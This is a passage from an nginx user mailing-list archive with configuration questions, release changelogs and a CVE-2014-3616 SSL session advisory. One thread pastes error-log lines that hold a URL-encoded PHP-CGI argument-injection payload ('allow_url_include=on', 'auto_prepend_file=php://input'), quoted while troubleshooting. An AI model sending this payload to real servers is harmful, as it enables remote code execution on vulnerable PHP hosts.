balancer. If your load balancer will be able to provide correct IP via X-Forwarded-For or other header, the realip module can be used to instruct nginx to use the address provided instead. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 15 19:17:17 2014 From: nginx-forum at nginx.us (itpp2012) Date: Mon, 15 Sep 2014 15:17:17 -0400 Subject: [ANN] Windows nginx 1.7.5.3 WhiteRabbit Message-ID: <372bcf56f544623038af23c4c0b9aea6.NginxMailingListEnglish@forum.nginx.org> 18:42 15-9-2014 nginx 1.7.5.3 WhiteRabbit Based on nginx 1.7.5 (15-9-2014, last changeset 5834:ca63fc5ed9b1) with; + lua-upstream-nginx-module v0.2 (upgraded 14-9-2014) + echo-nginx-module v0.56 (upgraded 14-9-2014) + nginx-rtmp-module, v1.1.4 (upgraded 14-9-2014) includes https://github.com/arut/nginx-rtmp-module/pull/469 + lua-nginx-module v0.9.13 (upgraded 14-9-2014) + Re-engineered changeset 5820:3377f9459e99, nice try but no sigar + Source changes back ported + Source changes add-on's back ported + Changes for nginx_basic: Source changes back ported * Scheduled release: yes * Additional specifications: see 'Feature list' Builds can be found here: http://nginx-win.ecsds.eu/ Follow releases https://twitter.com/nginx4Windows Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253259,253259#msg-253259 From nginx-forum at nginx.us Mon Sep 15 19:21:26 2014 From: nginx-forum at nginx.us (abstein2) Date: Mon, 15 Sep 2014 15:21:26 -0400 Subject: Max File Size Allowed In Cache Message-ID: Is there any way to limit the maximum size of an individual object in a proxy cache? Looking through the documentation ( http://nginx.org/en/docs/http/ngx_http_proxy_module.html ) I'm not seeing anything directly related to that. I might be misunderstanding the proxy_temp_file_write_size or proxy_max_temp_file_size commands, but outside of limiting the entire cache size with proxy_cache_path, I'm not seeing anything that says "this is the maximum size of an individual file that can sit in cache". Thanks! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253260,253260#msg-253260 From mdounin at mdounin.ru Mon Sep 15 19:23:02 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 23:23:02 +0400 Subject: Is symmetric routing required for a nginx deployment? In-Reply-To: References: Message-ID: <20140915192301.GQ59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 09:47:38AM -0600, Bryan Arenal wrote: > Hi, > > I'm investigating reverse proxy and content caching servers for a > deployment at work but our infrastructure is currently asymmetric where the > server would only see the inbound half of the conversation. Does nginx > require symmetric configuration in order to see the three-way handshake and > the subsequent GET? Yes. -- Maxim Dounin http://nginx.org/ From b.arenal at gmail.com Mon Sep 15 19:50:24 2014 From: b.arenal at gmail.com (Bryan Arenal) Date: Mon, 15 Sep 2014 13:50:24 -0600 Subject: Is symmetric routing required for a nginx deployment? In-Reply-To: <20140915192301.GQ59236@mdounin.ru> References: <20140915192301.GQ59236@mdounin.ru> Message-ID: Thanks, Maxim -- I greatly appreciate your response. On Mon, Sep 15, 2014 at 1:23 PM, Maxim Dounin wrote: > Hello! > > On Mon, Sep 15, 2014 at 09:47:38AM -0600, Bryan Arenal wrote: > > > Hi, > > > > I'm investigating reverse proxy and content caching servers for a > > deployment at work but our infrastructure is currently asymmetric where > the > > server would only see the inbound half of the conversation. Does nginx > > require symmetric configuration in order to see the three-way handshake > and > > the subsequent GET? > > Yes. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 15 20:05:31 2014 From: nginx-forum at nginx.us (matt_l) Date: Mon, 15 Sep 2014 16:05:31 -0400 Subject: multiple limit_req_zone In-Reply-To: <1443902.uLfRjDonPW@vbart-laptop> References: <1443902.uLfRjDonPW@vbart-laptop> Message-ID: Valentin, Thank you so much for your example. It definitely helps. When you say "A client IP address serves as a key. [...]. One megabyte zone can keep about 16 thousand 64-byte states." Does that mean that 1 megabyte zone can keep the state on 16 thousand different sending IP addresses? What about the following 2 use cases: Use Case #1: One receives 10 requests per second from 10 different clients/IPs each of them sending 1 request per second Use Case #2: One receives 10 requests per second from 1 client/IP sending 10 requests per second. Should the zone size be different? Thank you. -matthieu Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253227,253263#msg-253263 From vbart at nginx.com Mon Sep 15 23:02:16 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 16 Sep 2014 03:02:16 +0400 Subject: multiple limit_req_zone In-Reply-To: References: <1443902.uLfRjDonPW@vbart-laptop> Message-ID: <3889789.3Ipc0BMIgF@vbart-laptop> On Monday 15 September 2014 16:05:31 matt_l wrote: > Valentin, > Thank you so much for your example. It definitely helps. > When you say "A client IP address serves as a key. [...]. One megabyte zone > can keep about 16 thousand 64-byte states." Does that mean that 1 megabyte > zone can keep the state on 16 thousand different sending IP addresses? Yes. > What about the following 2 use cases: > Use Case #1: One receives 10 requests per second from 10 different > clients/IPs each of them sending 1 request per second > Use Case #2: One receives 10 requests per second from 1 client/IP sending > 10 requests per second. > Should the zone size be different? Each state is needed to be kept till it has something in the bucket. If in the first case the clients doesn't send requests at the same time, but with 100ms interval between each other, then a place for one state would be enough. Otherwise, nginx will need up to 10 states to handle them. In the second case only one state is used. wbr, Valentin V. Bartenev From mdounin at mdounin.ru Tue Sep 16 12:00:27 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 16:00:27 +0400 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: <5326f1134ec41677f09a751eddc15e9c@ruby-forum.com> References: <20130311121220.GX15378@mdounin.ru> <20140915104333.GH59236@mdounin.ru> <5326f1134ec41677f09a751eddc15e9c@ruby-forum.com> Message-ID: <20140916120027.GE59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 06:16:58PM +0200, Wter S. wrote: > Then how Nginx is able to handle thousands simultaneous requests (where > some of them contains blocking IO operations) with only one process (or > let say 10 processes) ? That's because nginx is event-driven server and uses non-blocking IO whenever possible. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 16 14:46:20 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 18:46:20 +0400 Subject: nginx-1.7.5 Message-ID: <20140916144620.GH59236@mdounin.ru> Changes with nginx 1.7.5 16 Sep 2014 *) Security: it was possible to reuse SSL sessions in unrelated contexts if a shared SSL session cache or the same TLS session ticket key was used for multiple "server" blocks (CVE-2014-3616). Thanks to Antoine Delignat-Lavaud. *) Change: now the "stub_status" directive does not require a parameter. *) Feature: the "always" parameter of the "add_header" directive. *) Feature: the "proxy_next_upstream_tries", "proxy_next_upstream_timeout", "fastcgi_next_upstream_tries", "fastcgi_next_upstream_timeout", "memcached_next_upstream_tries", "memcached_next_upstream_timeout", "scgi_next_upstream_tries", "scgi_next_upstream_timeout", "uwsgi_next_upstream_tries", and "uwsgi_next_upstream_timeout" directives. *) Bugfix: in the "if" parameter of the "access_log" directive. *) Bugfix: in the ngx_http_perl_module. Thanks to Piotr Sikora. *) Bugfix: the "listen" directive of the mail proxy module did not allow to specify more than two parameters. *) Bugfix: the "sub_filter" directive did not work with a string to replace consisting of a single character. *) Bugfix: requests might hang if resolver was used and a timeout occurred during a DNS request. *) Bugfix: in the ngx_http_spdy_module when using with AIO. *) Bugfix: a segmentation fault might occur in a worker process if the "set" directive was used to change the "$http_...", "$sent_http_...", or "$upstream_http_..." variables. *) Bugfix: in memory allocation error handling. Thanks to Markus Linnala and Feng Gu. -- Maxim Dounin http://nginx.org/en/donation.html From mdounin at mdounin.ru Tue Sep 16 14:46:52 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 18:46:52 +0400 Subject: nginx-1.6.2 Message-ID: <20140916144652.GL59236@mdounin.ru> Changes with nginx 1.6.2 16 Sep 2014 *) Security: it was possible to reuse SSL sessions in unrelated contexts if a shared SSL session cache or the same TLS session ticket key was used for multiple "server" blocks (CVE-2014-3616). Thanks to Antoine Delignat-Lavaud. *) Bugfix: requests might hang if resolver was used and a DNS server returned a malformed response; the bug had appeared in 1.5.8. *) Bugfix: requests might hang if resolver was used and a timeout occurred during a DNS request. -- Maxim Dounin http://nginx.org/en/donation.html From mdounin at mdounin.ru Tue Sep 16 14:47:14 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 18:47:14 +0400 Subject: nginx security advisory (CVE-2014-3616) Message-ID: <20140916144714.GP59236@mdounin.ru> Hello! A problem with SSL session cache in nginx was identified by Antoine Delignat-Lavaud. It was possible to reuse cached SSL sessions in unrelated contexts, allowing virtual host confusion attacks in some configurations by an attacker in a privileged network position (CVE-2014-3616). The problem affects nginx 0.5.6 - 1.7.4 if the same shared ssl_session_cache and/or ssl_session_ticket_key are used for multiple server{} blocks. The problem is fixed in nginx 1.7.5, 1.6.2. Further details can be found in the paper by Antoine Delignat-Lavaud et al., available at http://bh.ht.vc/vhost_confusion.pdf. -- Maxim Dounin http://nginx.org/en/donation.html From maxim at nginx.com Tue Sep 16 14:48:54 2014 From: maxim at nginx.com (Maxim Konovalov) Date: Tue, 16 Sep 2014 18:48:54 +0400 Subject: Bugfix: requests might hang if resolver was used [...] In-Reply-To: <53FC8922.1030807@nginx.com> References: <53FC8922.1030807@nginx.com> Message-ID: <54184DD6.1070606@nginx.com> On 8/26/14 5:18 PM, Maxim Konovalov wrote: > Hi Jason, > > On 8/26/14 12:47 PM, Jason Woods wrote: >> Hi, >> >> Where do I need to ask if a bug fix will be treated as major and >> ported to the 1.6 feature stable branch? >> >> Specifically, the following is having a significant impact for us, >> and makes using resolver extremely unstable with proxy_pass and >> variables. >> >> *) Bugfix: requests might hang if resolver was used and a DNS server >> returned a malformed response; the bug had appeared in 1.5.8. >> >> We're testing 1.7 mainline, but I would expect that due to existence >> and availability of 1.6, things like this would be fixed in that >> branch too, since it's still a "current" version? >> > We are working now on the another bugfix in the nginx resolver code > and will consider backporting these patches to 1.6.2 (ETA ~2 weeks). > Done: http://nginx.org/en/CHANGES-1.6 -- Maxim Konovalov http://nginx.com From shmick at riseup.net Tue Sep 16 14:54:01 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Wed, 17 Sep 2014 00:54:01 +1000 Subject: 2 certs, 1 domain, 1 IP Message-ID: <54184F09.6090205@riseup.net> is it possible with SNI and nginx to have both an ECDSA and RSA cert serving 1 website on 1 IP ? best practices ? From thunderhill4 at gmail.com Tue Sep 16 16:10:05 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Tue, 16 Sep 2014 21:40:05 +0530 Subject: authentication webserver behind nginx rps Message-ID: Hi, My reverse proxy setup is like this http://nginx_rps ---> https://authwebser:443 ( I dont have access to authserver ) The reverse proxy is correctly redirecting when I access the http://nginx_rps through browser. But when I type the credentials correctly in the webpage it is giving credential error. That means nginx is not correctly passing the credentials to authserver over ssl. What is wrong with my setup. Do I need to modify anything ? server { listen 80 default_server; listen [::]:80 default_server ipv6only=on; root /usr/share/nginx/html; index index.html index.htm; # Make site accessible from http://localhost/ # server_name localhost; server_name XXXXXXXXX; access_log /var/log/nginx/access.log; location / { # First attempt to serve request as file, then # as directory, then fall back to displaying a 404. proxy_set_header Host $host; proxy_set_header Host $host; proxy_set_header Accept-Encoding ""; proxy_set_header X-Real-IP $remote_addr; proxy_pass https://XXXXXXXXXX ; #include /etc/nginx/proxy.conf; # try_files $uri $uri/ =404; # Uncomment to enable naxsi on this location # include /etc/nginx/naxsi.rules } # Only for nginx-naxsi used with nginx-naxsi-ui : process denied requests What needs to be done so that the authentication happens correctly over ssl from nginx to authserver. Regards T -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 16 18:24:18 2014 From: nginx-forum at nginx.us (jpsonweb) Date: Tue, 16 Sep 2014 14:24:18 -0400 Subject: using location.capture to post a form Message-ID: Hi All, I am calling an webapplication from nginx. I want to capture the response and post the response body as a post parameter to another application. I am doing something like this local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST ,body = "name = John"}) The post goes through but receiving application does not get request parameter. Any suggestion would really be appreciated. -Jyoti Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253311,253311#msg-253311 From agentzh at gmail.com Tue Sep 16 18:51:37 2014 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Tue, 16 Sep 2014 11:51:37 -0700 Subject: using location.capture to post a form In-Reply-To: References: Message-ID: Hello! On Tue, Sep 16, 2014 at 11:24 AM, jpsonweb wrote: > I am calling an webapplication from nginx. I want to capture the response > and post the response body as a post parameter to another application. > I am doing something like this > local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST > ,body = "name = John"}) > The post goes through but receiving application does not get request > parameter. > I think you also need to pass the request header "Content-Type: application/x-www-form-urlencoded" to your subrequest because your "receiving application" might require that. Regards, -agentzh From nginx-forum at nginx.us Tue Sep 16 19:06:45 2014 From: nginx-forum at nginx.us (useopenid) Date: Tue, 16 Sep 2014 15:06:45 -0400 Subject: Client IP address Message-ID: We have a cluster of 4 nginx proxies behind a piranha load balancer setup. This morning we suffered a DOS attack, however the "client" address appears to have only gotten logged correctly the first time, the rest have the virtual ip address targeted as the "client", and it's unclear how or why that would happen. The setup is in "direct return" mode... Thanks for any insights! Sep 16 05:45:25 mailproxy-lb-01 nginx: 2014/09/16 05:45:25 [error] 16529#0: *111301 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 213.5.67.223, server: mail.wvi.com, request: "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", upstream: "http://207.55.17.73:80/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%6 Sep 16 05:45:25 mailproxy-lb-01 nginx: 2014/09/16 05:45:25 [error] 16529#0: *111303 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 207.55.17.73, server: mail.wvi.com, request: "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0", upstream: "http://207.55.17.73:80/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%6 Sep 16 05:45:25 mailproxy-lb-01 nginx: 2014/09/16 05:45:25 [info] 16529#0: *111303 shutdown() failed (107: Transport endpoint is not connected) while sending to client, client: 207.55.17.73, server: mail.wvi.com, request: "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0", upstream: "http://207.55.17.73:80/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69 Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253313,253313#msg-253313 From nginx-forum at nginx.us Tue Sep 16 19:19:05 2014 From: nginx-forum at nginx.us (nfn) Date: Tue, 16 Sep 2014 15:19:05 -0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <20140915105129.GI59236@mdounin.ru> References: <20140915105129.GI59236@mdounin.ru> Message-ID: <8ea43182ffac53651b7c063bbab9c90a.NginxMailingListEnglish@forum.nginx.org> Hi Just find out some clues and these are related to segmentation faults. In php logs ia have: WARNING: [pool www] child 20050 exited on signal 11 (SIGSEGV) after 57.791598 seconds from start in /var/log/messages I have :php5-fpm[2791]: segfault at fffffffa ip 0832d6d4 sp bf8e51c0 error 5 in php5-fpm[8048000+835000] I'm running Debian wheezy with dotdeb repo (5.5.16-1~dotdeb.1) and opcache with apcu. This neve happened to me. Should I try to change to xcache with memcache? Any suggestions? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253117,253314#msg-253314 From aircw2005 at gmail.com Tue Sep 16 21:32:41 2014 From: aircw2005 at gmail.com (Wei Chen) Date: Tue, 16 Sep 2014 14:32:41 -0700 Subject: How to sort parameters in nginx cache key Message-ID: Hi: We are experiencing low cache hit ratio in Nginx server. It turned out that one reason is client may be sending the same requests with parameters in different orders. e.g. foo?p1=a&p2=b&p3=c foo?p2=b&p1=a&p3=c And our cache key is set as proxy_cache_key $uri$is_args$args; It is not feasible to change all clients to resort their urls. Is there any way in Nginx to address that? Thanks, -Wei From vbart at nginx.com Tue Sep 16 22:04:44 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 17 Sep 2014 02:04:44 +0400 Subject: How to sort parameters in nginx cache key In-Reply-To: References: Message-ID: <3214902.JcCVj3zQQe@vbart-laptop> On Tuesday 16 September 2014 14:32:41 Wei Chen wrote: > Hi: > > We are experiencing low cache hit ratio in Nginx server. It turned out > that one reason is client may be sending the same requests with > parameters in different orders. > > e.g. > > foo?p1=a&p2=b&p3=c > foo?p2=b&p1=a&p3=c > > And our cache key is set as > proxy_cache_key $uri$is_args$args; > > It is not feasible to change all clients to resort their urls. Is > there any way in Nginx to address that? > You can sort them manually: proxy_cache_key $uri$is_args$arg_p1&$arg_p2&$arg_p3; wbr, Valentin V. Bartenev From nginx-forum at nginx.us Tue Sep 16 22:52:57 2014 From: nginx-forum at nginx.us (useopenid) Date: Tue, 16 Sep 2014 18:52:57 -0400 Subject: Client IP address In-Reply-To: References: Message-ID: <9bfca9ad32e7daaba52eeaa55c8dac0a.NginxMailingListEnglish@forum.nginx.org> Additional information: I caught it in the act, and something about this trigger and the setup is causing nginx to loop - the client ip address is actually right and nginx is proxying the request to itself as fast as it can. Restarting nginx stops the loop. This is version 0.7.65. I tried upgrading to 1.7.4 recently but the syslog support doesn't seem to work for mail and I haven't gotten a chance to try the old patches yet. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253313,253317#msg-253317 From nginx-forum at nginx.us Tue Sep 16 23:03:10 2014 From: nginx-forum at nginx.us (useopenid) Date: Tue, 16 Sep 2014 19:03:10 -0400 Subject: Client IP address In-Reply-To: <9bfca9ad32e7daaba52eeaa55c8dac0a.NginxMailingListEnglish@forum.nginx.org> References: <9bfca9ad32e7daaba52eeaa55c8dac0a.NginxMailingListEnglish@forum.nginx.org> Message-ID: Never mind - a new proxy target was misconfigured. Doh! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253313,253318#msg-253318 From steve at greengecko.co.nz Tue Sep 16 23:18:43 2014 From: steve at greengecko.co.nz (Steve Holdoway) Date: Wed, 17 Sep 2014 11:18:43 +1200 Subject: password protect site except for one page Message-ID: <1410909523.3094.309.camel@steve-new> Hi folks, Does anyone have a nifty solution for this? The problem is that it's a wordpress site, so just location / { auth_basic "Coming soon..."; auth_basic_user_file /etc/nginx/security/lock; ... } location /demo { auth_basic off; ... } doesn't work for /demo due to static content, etc. The only way I can think of is to directly lock the other pages rather than / thoughts? Steve -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From kworthington at gmail.com Wed Sep 17 01:15:57 2014 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 16 Sep 2014 21:15:57 -0400 Subject: [nginx-announce] nginx-1.6.2 In-Reply-To: <20140916144657.GM59236@mdounin.ru> References: <20140916144657.GM59236@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.6.2 for Windows http://goo.gl/ioBvGK (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available via: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Sep 16, 2014 at 10:46 AM, Maxim Dounin wrote: > Changes with nginx 1.6.2 16 Sep > 2014 > > *) Security: it was possible to reuse SSL sessions in unrelated > contexts > if a shared SSL session cache or the same TLS session ticket key was > used for multiple "server" blocks (CVE-2014-3616). > Thanks to Antoine Delignat-Lavaud. > > *) Bugfix: requests might hang if resolver was used and a DNS server > returned a malformed response; the bug had appeared in 1.5.8. > > *) Bugfix: requests might hang if resolver was used and a timeout > occurred during a DNS request. > > > -- > Maxim Dounin > http://nginx.org/en/donation.html > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From kworthington at gmail.com Wed Sep 17 01:22:20 2014 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 16 Sep 2014 21:22:20 -0400 Subject: [nginx-announce] nginx-1.7.5 In-Reply-To: <20140916144625.GI59236@mdounin.ru> References: <20140916144625.GI59236@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.7.5 for Windows http://goo.gl/pTAVLA (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available via: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Sep 16, 2014 at 10:46 AM, Maxim Dounin wrote: > Changes with nginx 1.7.5 16 Sep > 2014 > > *) Security: it was possible to reuse SSL sessions in unrelated > contexts > if a shared SSL session cache or the same TLS session ticket key was > used for multiple "server" blocks (CVE-2014-3616). > Thanks to Antoine Delignat-Lavaud. > > *) Change: now the "stub_status" directive does not require a > parameter. > > *) Feature: the "always" parameter of the "add_header" directive. > > *) Feature: the "proxy_next_upstream_tries", > "proxy_next_upstream_timeout", "fastcgi_next_upstream_tries", > "fastcgi_next_upstream_timeout", "memcached_next_upstream_tries", > "memcached_next_upstream_timeout", "scgi_next_upstream_tries", > "scgi_next_upstream_timeout", "uwsgi_next_upstream_tries", and > "uwsgi_next_upstream_timeout" directives. > > *) Bugfix: in the "if" parameter of the "access_log" directive. > > *) Bugfix: in the ngx_http_perl_module. > Thanks to Piotr Sikora. > > *) Bugfix: the "listen" directive of the mail proxy module did not > allow > to specify more than two parameters. > > *) Bugfix: the "sub_filter" directive did not work with a string to > replace consisting of a single character. > > *) Bugfix: requests might hang if resolver was used and a timeout > occurred during a DNS request. > > *) Bugfix: in the ngx_http_spdy_module when using with AIO. > > *) Bugfix: a segmentation fault might occur in a worker process if the > "set" directive was used to change the "$http_...", > "$sent_http_...", > or "$upstream_http_..." variables. > > *) Bugfix: in memory allocation error handling. > Thanks to Markus Linnala and Feng Gu. > > > -- > Maxim Dounin > http://nginx.org/en/donation.html > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 17 01:34:28 2014 From: nginx-forum at nginx.us (aircw) Date: Tue, 16 Sep 2014 21:34:28 -0400 Subject: How to sort parameters in nginx cache key In-Reply-To: <3214902.JcCVj3zQQe@vbart-laptop> References: <3214902.JcCVj3zQQe@vbart-laptop> Message-ID: Valentin: I forgot to mention that the number of parameters is very big (> 100) and keeps growing. So manual sort is not an option :(. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253315,253323#msg-253323 From thunderhill4 at gmail.com Wed Sep 17 05:24:40 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Wed, 17 Sep 2014 10:54:40 +0530 Subject: tomcat https server behind nginx and bad gateway Message-ID: Hi, I have a tomcat server running behind nginx proxy. When I access the nginx from browser it is throwing bad gateway error. According to the tomcat application developer nginx is unable to import the ssl certs. How to import certs in to nginx? Any pointers? the setup is like follows browser http req --> http://nginx_rps httpsreq---> https://authwebser:443 This is in continuation with my previous post http://mailman.nginx.org/pipermail/nginx/2014-September/045115.html -- T -------------- next part -------------- An HTML attachment was scrubbed... URL: From artemrts at ukr.net Wed Sep 17 05:49:36 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 08:49:36 +0300 Subject: Response header from fcgi server Message-ID: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> Hi, PHP-application sends response with HTTP header X-Language and I need pass this to nginx. With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. What I am doing wrong? From artemrts at ukr.net Wed Sep 17 06:35:59 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 09:35:59 +0300 Subject: Response header from fcgi server In-Reply-To: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> Message-ID: <1410935671.307782883.9zczp9va@frv34.fwdcdn.com> ? --- Original message --- From: "wishmaster" Date: 17 September 2014, 08:49:51 > Hi, > > PHP-application sends response with HTTP header X-Language and I need pass this to nginx. > With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. > > What I am doing wrong? > Hmm... Interesting. I have changed header from "X-Language" to something like "Currlang" and now I see variable $sent_http_currlang. From francis at daoine.org Wed Sep 17 07:06:33 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:06:33 +0100 Subject: Response header from fcgi server In-Reply-To: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> Message-ID: <20140917070633.GC3771@daoine.org> On Wed, Sep 17, 2014 at 08:49:36AM +0300, wishmaster wrote: Hi there, > PHP-application sends response with HTTP header X-Language and I need pass this to nginx. > With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. > > What I am doing wrong? $http_x_language is a request header field -- what the client sent to nginx. $sent_http_x_language is a response header field -- what nginx sent to the client. $upstream_http_x_language would be what an upstream sent to nginx. What do you do? What do you see? What do you expect to see? f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 17 07:10:02 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:10:02 +0100 Subject: password protect site except for one page In-Reply-To: <1410909523.3094.309.camel@steve-new> References: <1410909523.3094.309.camel@steve-new> Message-ID: <20140917071002.GD3771@daoine.org> On Wed, Sep 17, 2014 at 11:18:43AM +1200, Steve Holdoway wrote: Hi there, > Does anyone have a nifty solution for this? The problem is that it's a > wordpress site, so just > > location / { > auth_basic "Coming soon..."; > auth_basic_user_file /etc/nginx/security/lock; > ... > } > > location /demo { > auth_basic off; > ... > } > > doesn't work for /demo due to static content, etc. location /static {} ? What are the urls that you do want to password-protect, and what are the urls that you do not want to password-protect? ("one page" appears not to be "one url".) Alternatively, could you put all of your "demo" content below /demo? f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 17 07:17:07 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:17:07 +0100 Subject: trouble changing uri to query string In-Reply-To: References: Message-ID: 